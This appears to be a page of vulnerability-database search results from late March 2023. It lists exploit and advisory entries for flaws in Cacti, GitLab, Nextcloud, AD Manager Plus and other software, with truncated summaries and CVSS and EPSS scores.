11234 matches found

GithubExploit
added 2023/04/01 10:37 p.m. | 331 views

Exploit for Incorrect Authorization in Cacti

CVE-2022-46169 unaut...

9.8 CVSS, 10 AI score, 0.99826 EPSS
Exploits: 48

Exploit DB
added 2023/04/01 12:0 a.m. | 318 views

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Date: 2022-12-25 Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to...

9.9 CVSS, 9.8 AI score, 0.75718 EPSS
Exploits: 4

Exploit DB
added 2023/04/01 12:0 a.m. | 393 views

AD Manager Plus 7122 - Remote Code Execution (RCE)

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

10 CVSS, 8.8 AI score, 0.99999 EPSS
Exploits: 347

Rapid7 Blog
added 2023/03/31 4:54 p.m. | 67 views

Metasploit Weekly Wrap-up

Windows 11 ADF WinSock Priv Esc The new windows/local/cve202321768afdlpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write...

10 CVSS, 8.5 AI score, 0.93384 EPSS
Exploits: 23

0day.today
added 2023/03/31 12:0 a.m. | 143 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

6.8 AI score
Exploits: 0

0day.today
added 2023/03/31 12:0 a.m. | 139 views

Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

6.8 AI score
Exploits: 0

Exploit DB
added 2023/03/31 12:0 a.m. | 696 views

Cacti v1.2.22 - Remote Command Execution (RCE)

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x...

9.8 CVSS, 9.8 AI score, 0.99826 EPSS
Exploits: 48

Exploit DB
added 2023/03/31 12:0 a.m. | 163 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

7.4 AI score
Exploits: 0

NVD
added 2023/03/30 7:15 p.m. | 20 views

CVE-2023-26482

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9 CVSS, 9 AI score, 0.04176 EPSS
Exploits: 2, References: 2

Prion
added 2023/03/30 7:15 p.m. | 16 views

Design/Logic Flaw

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

6.5 CVSS, 8.6 AI score, 0.04176 EPSS
Exploits: 2, References: 2, Affected Software: 1

OSV
added 2023/03/30 6:27 p.m. | 19 views

CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9 CVSS, 8.7 AI score, 0.04176 EPSS
Exploits: 2, References: 4

Cvelist
added 2023/03/30 6:27 p.m. | 28 views

CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9 CVSS, 9.2 AI score, 0.04176 EPSS
Exploits: 2, References: 2

CVE
added 2023/03/30 6:27 p.m. | 168 views

CVE-2023-26482

CVE-2023-26482 affects Nextcloud Server (24.x prior to 24.0.10 and 25.x prior to 25.0.4 in several sources). The issue is a missing scope validation for Workflow operations, allowing creation of workflows intended for admins to be usable by non-admin contexts and, in combination with certain apps...

9 CVSS, 8.6 AI score, 0.04176 EPSS
Exploits: 2, References: 2, Affected Software: 1

Cvelist
added 2023/03/30 11:25 a.m. | 23 views

CVE-2023-28731 Unauthenticated RCE affecting the AcyMailing plugin for Joomla

AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0...

9.8 CVSS, 9.9 AI score, 0.01782 EPSS
Exploits: 1, References: 2

Vulnrichment
added 2023/03/30 9:10 a.m. | 8 views

CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE

UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...

6.9 AI score, 0.02957 EPSS
Exploits: 0, References: 1

Cvelist
added 2023/03/30 9:10 a.m. | 19 views

CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE

UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...

9 AI score, 0.02957 EPSS
Exploits: 0, References: 1

Nextcloud
added 2023/03/30 8:18 a.m. | 41 views

Scope of workflow operations is not validated

None...

9 CVSS, 8.6 AI score, 0.04176 EPSS
Exploits: 2, References: 1, Affected Software: 1

Packet Storm
added 2023/03/30 12:0 a.m. | 427 views

Covenant 0.5 Remote Code Execution

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

6.8 AI score
Exploits: 0

Exploit DB
added 2023/03/30 12:0 a.m. | 192 views

Covenant v0.5 - Remote Code Execution (RCE)

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

7.4 AI score
Exploits: 0

Tenable Nessus
added 2023/03/30 12:0 a.m. | 35 views

RHEL 8 : Red Hat JBoss Enterprise Application Platform 7.4.10 on RHEL 8 (RHSA-2023:1513)

The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2023:1513 advisory. Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release o...

9.8 CVSS, 8 AI score, 0.99615 EPSS
Exploits: 10, References: 44